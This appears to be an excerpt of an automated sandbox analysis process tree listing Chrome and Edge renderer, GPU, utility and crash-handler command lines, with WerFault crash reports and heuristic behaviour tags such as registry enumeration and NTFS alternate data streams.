C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5068,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5084 /prefetch:13⤵PID:1272
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1272 -s 9644⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3176
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5464,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5420 /prefetch:13⤵PID:1996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5588,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5624 /prefetch:13⤵PID:10188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5584,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5604 /prefetch:13⤵PID:10196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5832,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5744 /prefetch:13⤵PID:8264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6052,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=6056 /prefetch:13⤵PID:7848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=6188,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=6168 /prefetch:13⤵PID:7692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5292,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=6324 /prefetch:13⤵PID:5408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=6484,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=6440 /prefetch:13⤵PID:5264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=6488,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=6500 /prefetch:13⤵PID:8808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6728,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=6760 /prefetch:83⤵PID:6172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=6724,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=6772 /prefetch:13⤵PID:7032
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7032 -s 804⤵PID:4016
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7032 -s 924⤵PID:8660
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=7028,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=7104 /prefetch:13⤵PID:5800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=7036,i,4959356692026084038,9641843929429694377,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=7128 /prefetch:13⤵PID:6956
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default2⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5568 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x140,0x144,0x148,0x13c,0x14c,0x7ff9f6b846f8,0x7ff9f6b84708,0x7ff9f6b847183⤵PID:9312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:23⤵PID:7452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2472 /prefetch:33⤵PID:1048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:83⤵PID:7800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:13⤵PID:7220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:13⤵PID:6944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4120 /prefetch:13⤵PID:1768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:13⤵PID:2264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3664 /prefetch:83⤵PID:7444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3664 /prefetch:83⤵PID:4500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3800 /prefetch:13⤵PID:6432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:13⤵PID:3904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:13⤵PID:6100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:13⤵PID:7184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:13⤵PID:2736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:13⤵PID:9144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:13⤵PID:7008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:13⤵PID:5308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6420 /prefetch:83⤵PID:1856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:13⤵PID:5588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:13⤵PID:8672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:13⤵PID:9376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:13⤵PID:2120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:13⤵PID:9392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7144 /prefetch:13⤵PID:9396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7160 /prefetch:13⤵PID:9400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6760 /prefetch:83⤵PID:9724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7900 /prefetch:13⤵PID:10100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7664 /prefetch:13⤵PID:2524
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2524 -s 2524⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:7952
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8240 /prefetch:13⤵PID:5388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8368 /prefetch:13⤵PID:7244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8500 /prefetch:13⤵PID:9912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7588 /prefetch:13⤵PID:10116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8752 /prefetch:13⤵PID:3104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8884 /prefetch:13⤵PID:9944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9008 /prefetch:13⤵PID:10032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9148 /prefetch:13⤵PID:9260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2156,11765817020556343923,5676415008575453408,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9276 /prefetch:83⤵PID:7180
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:8652 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9f6b846f8,0x7ff9f6b84708,0x7ff9f6b847183⤵PID:5144
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=fallback-handler --database="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --exception-pointers=134243500933120 --process=176 /prefetch:7 --thread=57084⤵PID:212
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2296 /prefetch:23⤵PID:8648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2348 /prefetch:33⤵PID:6032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:83⤵PID:5808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:13⤵PID:5740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:13⤵PID:8360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4120 /prefetch:13⤵PID:5508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:13⤵PID:8860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3464 /prefetch:83⤵PID:8072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3464 /prefetch:83⤵PID:7380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,12856627474426221808,17953868324168365158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:13⤵PID:9660
-
-
